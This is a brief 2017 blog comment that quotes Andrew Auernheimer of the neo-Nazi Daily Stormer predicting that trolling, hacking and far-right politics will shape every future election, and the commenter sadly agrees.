    “There will never be an election again in which trolling, hacking and extreme far-right politics do not play a role,” Andrew Auernheimer, a hacker and blogger for the U.S. neo-Nazi Daily Stormer website wrote after Donald Trump’s election victory last year.

    Tragically, Yep.

    Posted by Pterrafractyl | September 20, 2017, 11:09 pm

Post a comment